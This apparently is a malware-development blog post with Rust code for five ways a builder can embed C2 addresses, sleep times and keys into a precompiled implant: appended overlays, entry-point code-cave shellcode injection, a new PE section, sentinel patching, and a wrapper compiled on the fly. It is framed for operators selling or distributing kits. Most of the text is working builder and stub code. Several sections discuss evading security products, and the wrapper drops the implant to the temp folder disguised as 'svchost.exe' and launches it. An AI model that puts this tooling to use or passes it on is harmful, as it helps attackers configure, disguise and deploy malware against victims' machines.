Intro

During my dive into the world of malware development, after creating some proof-of-concept beacons and other tooling, I kept circling back to the same question: how do malware builders actually work?

The core problem is straightforward. You have a compiled binary — your implant, beacon, RAT, whatever — and you need a builder program that can stamp operator-supplied configuration (C2 address, sleep time, encryption keys, etc.) into that binary without shipping the source code and without invoking a compiler at build time.

This rules out the naïve approach of just templating config values into source and running cargo build. You’d have to distribute the entire toolchain and your source tree, which is a non-starter if you’re selling or distributing a compiled kit.

So how do you get config into a binary post-compilation? I came up with (and researched) five methods, ordered roughly from crude to elegant:

  1. Barbaric — Append Bytes
  2. Okay-ish — Entry-Point Shellcode Injection
  3. Decent — Custom PE Section
  4. Smooth — Sentinel Patching
  5. Most Flexible — Compiled Wrapper (my favorite)

Let’s walk through each.


The Barbaric Method (append bytes)

The simplest idea: just append raw bytes to the end of the PE file. The Windows loader ignores anything past the last section, so the stub can open its own file at runtime, read a small trailer at the very end, and work backwards from there to find the config.

Builder side:

use std::fs;

fn stamp_config(stub_path: &str, output_path: &str, config: &[u8]) -> std::io::Result<()> {
    let mut buf = fs::read(stub_path)?;

    // Append the config first, then its length as a 4-byte little-endian
    // field, so the stub can work backwards from the end of the file.
    let len = (config.len() as u32).to_le_bytes();
    buf.extend_from_slice(config);
    buf.extend_from_slice(&len);

    // Append a magic trailer so the stub can validate.
    buf.extend_from_slice(b"CFGX");

    fs::write(output_path, buf)
}

Stub (implant) side:

use std::env;
use std::fs;
use std::io::{self, Read, Seek, SeekFrom};

fn read_appended_config() -> io::Result<Vec<u8>> {
    let exe_path = env::current_exe()?;
    let mut file = fs::File::open(exe_path)?;

    // Read the 4-byte magic trailer.
    file.seek(SeekFrom::End(-4))?;
    let mut magic = [0u8; 4];
    file.read_exact(&mut magic)?;
    if &magic != b"CFGX" {
        return Err(io::Error::new(io::ErrorKind::InvalidData, "no config found"));
    }

    // Read the 4-byte length that precedes the magic.
    file.seek(SeekFrom::End(-8))?;
    let mut len_buf = [0u8; 4];
    file.read_exact(&mut len_buf)?;
    let len = u32::from_le_bytes(len_buf) as usize;

    // Now read `len` bytes of config.
    file.seek(SeekFrom::End(-8 - len as i64))?;
    let mut config = vec![0u8; len];
    file.read_exact(&mut config)?;

    Ok(config)
}
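
The two snippets above agree on a trailer layout of [stub bytes][config][u32 length, little-endian][CFGX]. Here is a minimal in-memory sketch of that layout, useful for checking the format without touching the filesystem. The names append_trailer and parse_trailer are mine, not part of any library, and the bounds checks are an addition the file-based version above leaves to the seek errors.

```rust
const MAGIC: &[u8; 4] = b"CFGX";

/// Builds `[stub][config][len: u32 LE][MAGIC]`.
/// Returns `None` if the config length does not fit the 4-byte field.
fn append_trailer(stub: &[u8], config: &[u8]) -> Option<Vec<u8>> {
    if config.len() > u32::MAX as usize {
        return None;
    }
    let mut out = Vec::with_capacity(stub.len() + config.len() + 8);
    out.extend_from_slice(stub);
    out.extend_from_slice(config);
    out.extend_from_slice(&(config.len() as u32).to_le_bytes());
    out.extend_from_slice(MAGIC);
    Some(out)
}

/// Recovers the config slice, or `None` if the trailer is missing or malformed.
fn parse_trailer(file: &[u8]) -> Option<&[u8]> {
    // Peel the magic off the end.
    let body = file.strip_suffix(MAGIC.as_slice())?;
    // The last four remaining bytes are the length field.
    let split = body.len().checked_sub(4)?;
    let (rest, len_bytes) = body.split_at(split);
    let len = u32::from_le_bytes([len_bytes[0], len_bytes[1], len_bytes[2], len_bytes[3]]) as usize;
    // The config is the last `len` bytes before the length field.
    let start = rest.len().checked_sub(len)?;
    Some(&rest[start..])
}
```

Calling parse_trailer on the output of append_trailer hands back the original config, and a file with no trailer (or a length that points before the start of the file) yields None instead of a panic.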

Pros:

  • Dead simple to implement.
  • Works on any format (PE, ELF, Mach-O) — there’s no format-specific parsing.

Cons:

  • The overlay is trivially visible in a hex editor. You can encrypt/compress it, but the decryption routine is still in the binary and easy to find.
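  • Some security products flag PE files that carry an overlay, meaning data past the end of the last section’s raw data.
  • If the stub carried a valid PE checksum, it no longer matches the file. Windows only enforces the checksum for drivers and a few critical system DLLs, but the mismatch may matter in some environments.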

The Okay-ish Method (entry-point shellcode injection)

Instead of appending data, this method patches the PE’s entry point to redirect into a small injected shellcode stub. That stub’s job is to set up the configuration in memory — for example, writing it to a known global address or storing it in an environment variable — then jump back to the original entry point.

The high-level flow:

  1. Builder reads the stub PE and locates the original entry point (OEP).
  2. Builder writes a small shellcode blob into slack space (padding at the end of .text or in a code cave).
  3. Builder patches the PE entry point to the start of the shellcode.
  4. The shellcode contains hardcoded config bytes and writes them to a predetermined virtual address (e.g., a global static mut buffer in the stub).
  5. The shellcode jumps to the OEP and normal execution continues.

Builder side (simplified concept):

use goblin::pe::PE;
use std::fs;

struct PatchSite {
    file_offset: usize,
    rva: u32,
}

/// Find usable slack space at the end of .text
fn find_code_cave(pe: &PE, raw: &[u8]) -> Option<PatchSite> {
    for section in &pe.sections {
        let name = String::from_utf8_lossy(&section.name);
        if !name.starts_with(".text") {
            continue;
        }

        let raw_size = section.size_of_raw_data as usize;
        let virt_size = section.virtual_size as usize;

        // Slack space sits between virtual_size and raw_size.
        if raw_size > virt_size {
            let cave_offset = section.pointer_to_raw_data as usize + virt_size;
            let cave_rva = section.virtual_address + virt_size as u32;
            let cave_size = raw_size - virt_size;

            // Make sure the cave is big enough for our stub.
            if cave_size >= 256 {
                return Some(PatchSite {
                    file_offset: cave_offset,
                    rva: cave_rva,
                });
            }
        }
    }
    None
}

fn inject_entry_shellcode(
    stub_path: &str,
    output_path: &str,
    config: &[u8],
    config_rva: u32,       // RVA of the global buffer in the stub
    image_base: u64,
) -> anyhow::Result<()> {
    let mut raw = fs::read(stub_path)?;
    let pe = PE::parse(&raw)?;
    let oep = pe.header.optional_header.unwrap()
        .standard_fields.address_of_entry_point;

    let cave = find_code_cave(&pe, &raw)
        .ok_or_else(|| anyhow::anyhow!("no suitable code cave found"))?;

    // Build a tiny x86-64 stub:
    //   lea rdi, [image_base + config_rva]
    //   mov rcx, config_len
    //   <copy the inline config bytes from the embedded blob, e.g. rep movsb;
    //    rep stosb would only fill the buffer with a single byte value>
    //   jmp image_base + oep
    let mut shellcode: Vec<u8> = Vec::new();

    // -- snip: assemble your position-dependent stub here --
    // The exact encoding depends on your assembler / hand-rolled bytes.
    // Key idea: write `config` bytes to `image_base + config_rva`, then
    // jmp to `image_base + oep`.

    // Placeholder: in practice you'd use something like `iced-x86` or
    // `keystone` to assemble this.
    let _ = (&config, config_rva, image_base, oep, &mut shellcode);

    // Locate AddressOfEntryPoint before touching `raw`: `pe` borrows `raw`,
    // so every read from `pe` has to happen before the first write.
    let ep_offset = pe.header.dos_header.pe_pointer as usize
        + 4   // "PE\0\0"
        + 20  // COFF header
        + 16; // offset of AddressOfEntryPoint in optional header
    drop(pe);

    // find_code_cave only guarantees 256 bytes of slack.
    anyhow::ensure!(shellcode.len() <= 256, "shellcode does not fit in the code cave");

    // Patch the shellcode into the code cave.
    raw[cave.file_offset..cave.file_offset + shellcode.len()]
        .copy_from_slice(&shellcode);

    // Patch entry point to our cave.
    raw[ep_offset..ep_offset + 4].copy_from_slice(&cave.rva.to_le_bytes());

    fs::write(output_path, raw)?;
    Ok(())
}

Stub side:

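The stub itself just declares a zeroed global buffer. Its address is chosen by the linker, so the builder has to learn the buffer’s RVA from the build (for example, from a linker map file):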

#[no_mangle]
#[used]
static mut CONFIG_BUFFER: [u8; 4096] = [0u8; 4096];

When execution reaches main, it reads CONFIG_BUFFER — the injected shellcode already populated it before the CRT ever ran.

Pros:

  • Config lives in a regular memory page, not in an obvious overlay.
  • Harder to spot than appended bytes since it blends with executable code.

Cons:

  • Architecture-specific (you need different shellcode for x86 vs x86-64).
  • Brittle: ASLR means you either need the image base to be fixed or you write position-independent shellcode that resolves addresses at runtime.
  • Writing correct shellcode is error-prone and tough to maintain.
  • Code-cave hunting isn’t guaranteed to succeed — you might need to extend a section or add a new one, which starts to overlap with method 3.

The Decent Method (custom PE section)

Rather than hiding in slack space or dangling off the end of the file, this method adds (or repurposes) a dedicated PE section — say .config — and writes the serialized configuration there. The stub binary parses its own PE headers at runtime, finds the section by name, and reads the config.

Builder side:

use goblin::pe::section_table::SectionTable;
use std::fs;

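const SECTION_NAME: &[u8; 8] = b".config\0";
// Common linker defaults, hard-coded to keep the example short. A robust
// builder would read FileAlignment and SectionAlignment from the stub's
// optional header instead.
const FILE_ALIGNMENT: u32 = 0x200;
const SECTION_ALIGNMENT: u32 = 0x1000;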

fn align(value: u32, alignment: u32) -> u32 {
    (value + alignment - 1) & !(alignment - 1)
}

fn inject_config_section(
    stub_path: &str,
    output_path: &str,
    config: &[u8],
) -> anyhow::Result<()> {
    let mut raw = fs::read(stub_path)?;
    let pe = goblin::pe::PE::parse(&raw)?;

    let last_section = pe.sections.last()
        .ok_or_else(|| anyhow::anyhow!("no sections"))?;

    // Compute the new section's addresses.
    let new_virt_addr = align(
        last_section.virtual_address + last_section.virtual_size,
        SECTION_ALIGNMENT,
    );
    let new_raw_offset = align(
        last_section.pointer_to_raw_data + last_section.size_of_raw_data,
        FILE_ALIGNMENT,
    );
    let raw_size = align(config.len() as u32, FILE_ALIGNMENT);

    // Build the section header.
    let mut header = [0u8; 40];
    header[..8].copy_from_slice(SECTION_NAME);

    // VirtualSize
    header[8..12].copy_from_slice(&(config.len() as u32).to_le_bytes());
    // VirtualAddress
    header[12..16].copy_from_slice(&new_virt_addr.to_le_bytes());
    // SizeOfRawData
    header[16..20].copy_from_slice(&raw_size.to_le_bytes());
    // PointerToRawData
    header[20..24].copy_from_slice(&new_raw_offset.to_le_bytes());
    // Characteristics: IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA
    let chars: u32 = 0x4000_0040;
    header[36..40].copy_from_slice(&chars.to_le_bytes());

    // Compute every offset up front: `pe` borrows `raw`, so all reads from
    // `pe` must happen before the first write into `raw`.
    let pe_offset = pe.header.dos_header.pe_pointer as usize;
    let section_count = pe.sections.len();
    let section_header_offset = pe_offset
        + 4   // "PE\0\0" signature
        + 20  // COFF header
        + pe.header.coff_header.size_of_optional_header as usize
        + section_count * 40; // existing section headers
    let first_raw_data = pe.sections[0].pointer_to_raw_data as usize;
    let num_sections_offset = pe_offset + 4 + 2; // NumberOfSections (COFF header)
    let soi_offset = pe_offset + 4 + 20 + 56;    // SizeOfImage (optional header)
    drop(pe);

    // Make sure there's room in the header gap.
    if section_header_offset + 40 > first_raw_data {
        anyhow::bail!("not enough room for another section header");
    }

    // Write the section header.
    raw[section_header_offset..section_header_offset + 40]
        .copy_from_slice(&header);

    // Increment NumberOfSections.
    let new_count = (section_count as u16 + 1).to_le_bytes();
    raw[num_sections_offset..num_sections_offset + 2]
        .copy_from_slice(&new_count);

    // Update SizeOfImage: end of the new section's virtual range, rounded up.
    let size_of_image = align(new_virt_addr + config.len() as u32, SECTION_ALIGNMENT);
    raw[soi_offset..soi_offset + 4]
        .copy_from_slice(&size_of_image.to_le_bytes());

    // Pad file to the new raw offset and write config data.
    raw.resize(new_raw_offset as usize, 0);
    raw.extend_from_slice(config);
    raw.resize((new_raw_offset + raw_size) as usize, 0);

    fs::write(output_path, raw)?;
    Ok(())
}
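
The address arithmetic in the builder is easier to trust with concrete numbers. The following is a small sketch of just that part, with the alignments passed in as parameters rather than hard-coded. SectionExtent, Placement, and place_after are hypothetical names for this illustration, and the sample values in the note below are made up.

```rust
/// Round `value` up to the next multiple of `alignment` (a power of two).
fn align(value: u32, alignment: u32) -> u32 {
    (value + alignment - 1) & !(alignment - 1)
}

/// The four header fields of the current last section that matter here.
struct SectionExtent {
    virtual_address: u32,
    virtual_size: u32,
    pointer_to_raw_data: u32,
    size_of_raw_data: u32,
}

/// Where a new section would land, plus the resulting SizeOfImage.
#[derive(Debug, PartialEq)]
struct Placement {
    virtual_address: u32,
    pointer_to_raw_data: u32,
    size_of_raw_data: u32,
    size_of_image: u32,
}

fn place_after(
    last: &SectionExtent,
    payload_len: u32,
    section_alignment: u32,
    file_alignment: u32,
) -> Placement {
    // In memory, sections start on SectionAlignment boundaries.
    let virtual_address = align(last.virtual_address + last.virtual_size, section_alignment);
    // On disk, raw data starts on FileAlignment boundaries.
    let pointer_to_raw_data =
        align(last.pointer_to_raw_data + last.size_of_raw_data, file_alignment);
    Placement {
        virtual_address,
        pointer_to_raw_data,
        // Raw size is padded to FileAlignment; VirtualSize stays at payload_len.
        size_of_raw_data: align(payload_len, file_alignment),
        // SizeOfImage covers the new section's virtual range, rounded up.
        size_of_image: align(virtual_address + payload_len, section_alignment),
    }
}
```

For a last section at RVA 0x5000 with virtual size 0x1A4, raw data at 0x2C00 of size 0x200, and a 300-byte payload with alignments 0x1000 and 0x200, the new section lands at RVA 0x6000 and file offset 0x2E00, occupies 0x200 bytes on disk, and SizeOfImage becomes 0x7000.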

Stub side:

use std::env;
use std::fs;
use goblin::pe::PE;

fn read_pe_section_config(section_name: &str) -> anyhow::Result<Vec<u8>> {
    let exe = env::current_exe()?;
    let raw = fs::read(&exe)?;
    let pe = PE::parse(&raw)?;

    for section in &pe.sections {
        let name = String::from_utf8_lossy(&section.name)
            .trim_end_matches('\0')
            .to_string();

        if name == section_name {
            let offset = section.pointer_to_raw_data as usize;
            let size = section.virtual_size as usize;
            return Ok(raw[offset..offset + size].to_vec());
        }
    }

    anyhow::bail!("section '{section_name}' not found")
}
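
If pulling a full PE parser into the stub feels heavy, the same lookup can be sketched with std only, which also shows where the fixed offsets used throughout this post come from. This is a simplified reading of the PE header layout under my own helper names (u16_at, u32_at, find_section). It does no validation beyond bounds checks and the PE signature.

```rust
/// Little-endian u16 at `off`, or `None` if out of bounds.
fn u16_at(b: &[u8], off: usize) -> Option<u16> {
    let s = b.get(off..off.checked_add(2)?)?;
    Some(u16::from_le_bytes([s[0], s[1]]))
}

/// Little-endian u32 at `off`, or `None` if out of bounds.
fn u32_at(b: &[u8], off: usize) -> Option<u32> {
    let s = b.get(off..off.checked_add(4)?)?;
    Some(u32::from_le_bytes([s[0], s[1], s[2], s[3]]))
}

/// Returns the file-backed bytes of the section called `name`, if present.
fn find_section<'a>(raw: &'a [u8], name: &str) -> Option<&'a [u8]> {
    // e_lfanew (offset 0x3C in the DOS header) points at "PE\0\0".
    let pe = u32_at(raw, 0x3C)? as usize;
    if raw.get(pe..pe.checked_add(4)?)? != &b"PE\0\0"[..] {
        return None;
    }
    let coff = pe + 4; // COFF header follows the signature
    let count = u16_at(raw, coff + 2)? as usize; // NumberOfSections
    let opt_size = u16_at(raw, coff + 16)? as usize; // SizeOfOptionalHeader
    let table = coff + 20 + opt_size; // section table follows the optional header

    for i in 0..count {
        let hdr = table + i * 40; // each section header is 40 bytes
        let raw_name = raw.get(hdr..hdr + 8)?;
        // Names are NUL-padded to eight bytes.
        let end = raw_name.iter().position(|&b| b == 0).unwrap_or(8);
        if &raw_name[..end] != name.as_bytes() {
            continue;
        }
        let virtual_size = u32_at(raw, hdr + 8)? as usize;
        let raw_size = u32_at(raw, hdr + 16)? as usize;
        let raw_ptr = u32_at(raw, hdr + 20)? as usize;
        // Only bytes backed by file data can be read from disk.
        let len = virtual_size.min(raw_size);
        return raw.get(raw_ptr..raw_ptr.checked_add(len)?);
    }
    None
}
```

Taking the smaller of VirtualSize and SizeOfRawData avoids reading past the section's file data when the two disagree, and every access goes through get so a truncated or malformed file produces None rather than a panic.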

Pros:

  • Clean and well-structured — the config has a proper home.
  • The stub doesn’t need architecture-specific tricks; it just parses its own PE at runtime.

Cons:

  • Adding a section named .config is a bit conspicuous. You could pick something less obvious (.rsrc2, .reloc, etc.) or overwrite an unused existing section.
  • Structural PE modifications can break code signing and trigger static analysis heuristics.

The Smooth Method (sentinel patching)

This is arguably the most common technique in real-world builders. The idea is simple: compile the stub with a known placeholder value (a magic sentinel) in a global static, and have the builder do a byte-level search-and-replace on the compiled file to swap the sentinel for the real config.

Because the sentinel lives in .data or .rdata, patching it doesn’t change the PE structure at all. No new sections, no overlays, no entry-point hooks. The file layout is identical to what the compiler produced; only the content of an initialized static changes.

Stub side:

/// 63-byte sentinel the builder will search for and replace.
/// The array length has to match the literal exactly or this won't compile.
/// Use something random enough that it won't collide with compiler output.
#[no_mangle]
#[used]
static CONFIG_SENTINEL: [u8; 63] = *b"<<~~__BUILDER_CONFIG_PLACEHOLDER_THAT_WONT_COLLIDE_EASILY__~~>>";

At runtime, the stub just reads CONFIG_SENTINEL — by the time it executes, the builder has already swapped in the real config:

fn get_config() -> &'static [u8] {
    // In a real implementation you'd have a length prefix or a
    // serialization format so you know where config ends.
    &CONFIG_SENTINEL
}

Builder side:

use std::fs;

// Must be byte-for-byte identical to the stub's sentinel (63 bytes).
const SENTINEL: &[u8; 63] =
    b"<<~~__BUILDER_CONFIG_PLACEHOLDER_THAT_WONT_COLLIDE_EASILY__~~>>";

fn patch_sentinel(
    stub_path: &str,
    output_path: &str,
    config: &[u8],
) -> anyhow::Result<()> {
    anyhow::ensure!(
        config.len() <= SENTINEL.len(),
        "config ({} bytes) exceeds sentinel slot ({} bytes)",
        config.len(),
        SENTINEL.len(),
    );

    let mut raw = fs::read(stub_path)?;

    // Find the sentinel.
    let pos = raw
        .windows(SENTINEL.len())
        .position(|w| w == SENTINEL.as_slice())
        .ok_or_else(|| anyhow::anyhow!("sentinel not found in stub"))?;

    // Overwrite with config, zero-pad the remainder.
    raw[pos..pos + config.len()].copy_from_slice(config);
    raw[pos + config.len()..pos + SENTINEL.len()].fill(0);

    fs::write(output_path, raw)?;
    Ok(())
}
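
One thing the builder above takes on faith is that the sentinel appears exactly once, since position stops at the first match. If the marker bytes ever showed up twice in the stub, the wrong copy could get patched silently. A sketch of a stricter variant follows, using my own helper names find_all and patch_unique, and plain String errors to stay std-only.

```rust
/// Byte offsets of every occurrence of `needle` in `haystack`.
fn find_all(haystack: &[u8], needle: &[u8]) -> Vec<usize> {
    // `windows(0)` panics, so handle the empty needle explicitly.
    if needle.is_empty() || needle.len() > haystack.len() {
        return Vec::new();
    }
    haystack
        .windows(needle.len())
        .enumerate()
        .filter(|(_, w)| *w == needle)
        .map(|(i, _)| i)
        .collect()
}

/// Overwrites the single occurrence of `marker` with `config`, zero-padding
/// the rest of the slot. Fails if the marker is absent or ambiguous.
fn patch_unique(image: &mut [u8], marker: &[u8], config: &[u8]) -> Result<usize, String> {
    if config.len() > marker.len() {
        return Err(format!(
            "config ({} bytes) exceeds slot ({} bytes)",
            config.len(),
            marker.len()
        ));
    }
    let hits = find_all(image, marker);
    match hits.as_slice() {
        [pos] => {
            let pos = *pos;
            image[pos..pos + config.len()].copy_from_slice(config);
            image[pos + config.len()..pos + marker.len()].fill(0);
            Ok(pos)
        }
        [] => Err("marker not found".to_string()),
        _ => Err(format!("marker found {} times, refusing to guess", hits.len())),
    }
}
```

Running the patch a second time on the same image fails with "marker not found", which doubles as a cheap guard against stamping an already-stamped binary.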

If you need more room than that (you almost certainly do), make the slot larger and give it some structure. The builder locates the slot by a short magic at its start, then overwrites the slot with a 4-byte length followed by the payload:

#[no_mangle]
#[used]
static CONFIG_SLOT: [u8; 4096] = {
    let mut buf = [0u8; 4096];
    // First 16 bytes are the magic, rest is zeroed.
    let magic = *b"__CFG_SENTINEL__";
    let mut i = 0;
    while i < 16 {
        buf[i] = magic[i];
        i += 1;
    }
    buf
};
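
Here is one way the two sides of that slot could look, as a sketch under my own assumptions: the patched layout is [u32 length, little-endian][payload][zero padding], and a slot that still starts with the magic counts as unpatched. The names fill_slot, read_slot, and load_slot are hypothetical. The volatile read is there because the optimizer may otherwise fold reads of an immutable static to the compile-time placeholder.

```rust
const SLOT_SIZE: usize = 4096;
const MAGIC: &[u8; 16] = b"__CFG_SENTINEL__";

/// Builder side: overwrite a located slot with `[len][payload][zeros]`.
fn fill_slot(slot: &mut [u8], config: &[u8]) -> Result<(), String> {
    let capacity = slot.len().saturating_sub(4);
    if slot.len() < 4 || config.len() > capacity || config.len() > u32::MAX as usize {
        return Err(format!(
            "config is {} bytes, slot holds {}",
            config.len(),
            capacity
        ));
    }
    slot[..4].copy_from_slice(&(config.len() as u32).to_le_bytes());
    slot[4..4 + config.len()].copy_from_slice(config);
    // Clear whatever is left of the magic and any stale bytes.
    slot[4 + config.len()..].fill(0);
    Ok(())
}

/// Stub side: `None` while the slot is unpatched or the length is implausible.
fn read_slot(slot: &[u8]) -> Option<&[u8]> {
    if slot.starts_with(MAGIC) {
        return None;
    }
    let head = slot.get(..4)?;
    let len = u32::from_le_bytes([head[0], head[1], head[2], head[3]]) as usize;
    slot.get(4..4usize.checked_add(len)?)
}

/// Stub side: copy the static out through a volatile read so the compiler
/// cannot substitute the values it saw at compile time.
fn load_slot(slot: &'static [u8; SLOT_SIZE]) -> [u8; SLOT_SIZE] {
    // SAFETY: the pointer comes from a valid reference to an initialized static.
    unsafe { std::ptr::read_volatile(slot) }
}
```

In the stub this would be used as read_slot(&load_slot(&CONFIG_SLOT)), treating None as "not configured" rather than trying to interpret placeholder bytes.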

Pros:

  • Zero structural changes to the PE — no new sections, no overlays.
  • The binary is indistinguishable from a “normal” build at the PE-header level.
  • Trivial to implement and rock-solid in practice.
  • Works on any format (ELF, Mach-O) without format-specific code in the builder, since you’re just doing a byte scan.

Cons:

  • Config size is bounded by the sentinel slot you compiled in. You have to decide on a maximum size upfront.
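  • If the compiler deduplicates or discards the static, the sentinel can disappear from the binary. #[used] and #[no_mangle] guard against that, but the optimizer may still constant-fold reads of an immutable static whose value is known at compile time, so the stub can end up acting on the placeholder rather than the patched bytes. Reading the slot through std::ptr::read_volatile (or std::hint::black_box) avoids this.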
  • The plaintext sentinel is visible in the stub binary on disk (before patching). Not a security issue since you’d distribute the patched output, but if someone gets the raw stub they can see your marker.

The Most Flexible Method (compiled wrapper)

All the previous methods share a constraint: they modify an existing binary. This method flips the model entirely. Instead of patching the stub, the builder compiles a brand-new, tiny wrapper that embeds the pre-built stub as a byte blob and the config as hardcoded constants.

The key insight is that the wrapper is so trivially small that you can ship its source or compile it on the fly without meaningful IP exposure. The real implant logic stays opaque inside the embedded blob.

Wrapper template (what the builder compiles):

// wrapper.rs: generated by the builder.

/// Pre-compiled implant binary, embedded at compile time.
const STUB: &[u8] = include_bytes!("stub.exe");

/// Config values stamped by the builder.
const C2_HOST: &str = "{{C2_HOST}}";
const C2_PORT: u16 = {{C2_PORT}};
const SLEEP_MS: u64 = {{SLEEP_MS}};
const ENCRYPTION_KEY: &[u8; 32] = b"{{ENCRYPTION_KEY}}";

fn main() {
    // Option A: Write stub to a temp file and execute it, passing config
    // via command-line args, environment variables, or a named pipe.
    let tmp = std::env::temp_dir().join("svchost.exe");
    std::fs::write(&tmp, STUB).unwrap();

    std::process::Command::new(&tmp)
        .env("CFG_HOST", C2_HOST)
        .env("CFG_PORT", C2_PORT.to_string())
        .env("CFG_SLEEP", SLEEP_MS.to_string())
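        // Hex-encode with std only: a single-file rustc build has no access
        // to external crates such as `hex`.
        .env("CFG_KEY", ENCRYPTION_KEY.iter().map(|b| format!("{b:02x}")).collect::<String>())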
        .spawn()
        .unwrap();

    // Option B: Instead of writing to disk, allocate RWX memory and
    // reflectively load the PE from the embedded bytes. This avoids
    // touching disk entirely but is more complex.
}
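
Option A leaves the receiving end implicit: the stub has to read those CFG_* variables back and validate them. Below is a sketch of what that could look like with std only. The Config struct and the function names are my own, and the lookup closure exists so the parsing can be exercised without touching real process state.

```rust
#[derive(Debug, PartialEq)]
struct Config {
    host: String,
    port: u16,
    sleep_ms: u64,
    key: [u8; 32],
}

/// Decode exactly 64 hex characters into 32 bytes.
fn decode_key(hex: &str) -> Option<[u8; 32]> {
    // Checking every byte up front also rules out the leading '+' that
    // `from_str_radix` would otherwise accept.
    if hex.len() != 64 || !hex.bytes().all(|b| b.is_ascii_hexdigit()) {
        return None;
    }
    let mut key = [0u8; 32];
    for (i, byte) in key.iter_mut().enumerate() {
        *byte = u8::from_str_radix(&hex[2 * i..2 * i + 2], 16).ok()?;
    }
    Some(key)
}

/// Builds a `Config` from any name -> value lookup.
/// Returns `None` if a variable is missing or fails to parse.
fn parse_config(lookup: impl Fn(&str) -> Option<String>) -> Option<Config> {
    Some(Config {
        host: lookup("CFG_HOST")?,
        port: lookup("CFG_PORT")?.parse().ok()?,
        sleep_ms: lookup("CFG_SLEEP")?.parse().ok()?,
        key: decode_key(&lookup("CFG_KEY")?)?,
    })
}

/// The real entry point: read from the process environment.
fn config_from_env() -> Option<Config> {
    parse_config(|name| std::env::var(name).ok())
}
```

Environment variables are visible to anything that can inspect the child process, which is one reason the template comment also lists a named pipe as an alternative channel.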

Builder side:

The builder is essentially a templating engine plus a rustc invocation:

use std::fs;
use std::process::Command;

fn build_wrapper(
    wrapper_template: &str,
    stub_path: &str,
    c2_host: &str,
    c2_port: u16,
    sleep_ms: u64,
    key: &[u8; 32],
    output_path: &str,
) -> anyhow::Result<()> {
    let workspace = tempfile::tempdir()?;

    // Copy stub into the workspace so include_bytes! can find it.
    let stub_dest = workspace.path().join("stub.exe");
    fs::copy(stub_path, &stub_dest)?;

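    // Render the wrapper source. Values are escaped before substitution so
    // they stay valid Rust literals: the host goes into a string literal,
    // the key into a byte-string literal as \xNN escapes (raw key bytes are
    // generally not valid UTF-8, so a lossy conversion would corrupt them).
    let key_literal: String = key.iter().map(|b| format!("\\x{b:02x}")).collect();
    let source = wrapper_template
        .replace("{{C2_HOST}}", &c2_host.escape_default().to_string())
        .replace("{{C2_PORT}}", &c2_port.to_string())
        .replace("{{SLEEP_MS}}", &sleep_ms.to_string())
        .replace("{{ENCRYPTION_KEY}}", &key_literal);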

    let src_path = workspace.path().join("wrapper.rs");
    fs::write(&src_path, source)?;

    // Compile.
    let status = Command::new("rustc")
        .arg(&src_path)
        .arg("-o")
        .arg(output_path)
        .arg("--edition=2021")
        .status()?;

    anyhow::ensure!(status.success(), "rustc failed");
    Ok(())
}

Pros:

  • Maximum flexibility: the config isn’t constrained to a fixed-size slot. It’s real Rust code — you can put anything in there.
  • The implant binary is never structurally modified, which means its hash is stable and code signing (if any) stays intact.
  • You can swap the delivery mechanism (drop-to-disk, reflective loading, process hollowing) by changing the wrapper template without touching the implant.

Cons:

  • Requires a Rust toolchain on the machine running the builder. This is the big one — it’s a heavy dependency for an operator’s box.
  • Compile times add latency to the build step (though rustc on a single small file is fast).
  • The wrapper source, while minimal, does reveal the delivery mechanism. Whether that matters depends on your threat model.

Comparison

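Method                | PE Structure Modified | Needs Compiler | Config Size Limit | Complexity
----------------------|-----------------------|----------------|-------------------|-----------
Append Bytes          | No (overlay only)     | No             | Unlimited         | Trivial
Entry-Point Shellcode | Yes (EP + cave)       | No             | Cave-dependent    | High
Custom PE Section     | Yes (new section)     | No             | Arbitrary         | Medium
Sentinel Patching     | No                    | No             | Fixed slot        | Low
Compiled Wrapper      | No (new binary)       | Yes            | Unlimited         | Medium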

Closing Thoughts

In practice, sentinel patching is the most popular approach in the wild because it hits the sweet spot of simplicity, reliability, and stealth. The PE structure stays clean, implementation is a dozen lines of code, and it works across platforms with no format-specific logic.

If you need unbounded config or want to decouple the delivery mechanism from the implant entirely, the compiled wrapper is the way to go — just accept the toolchain dependency.

The other three methods have their niches. Appended bytes are fine for quick prototypes where stealth doesn’t matter. Custom PE sections work well when you have structured config that outgrows a sentinel slot. And shellcode injection is there if you need to run code before the CRT initializes, though it’s rarely worth the fragility.

Pick the one that fits your project’s constraints and build from there.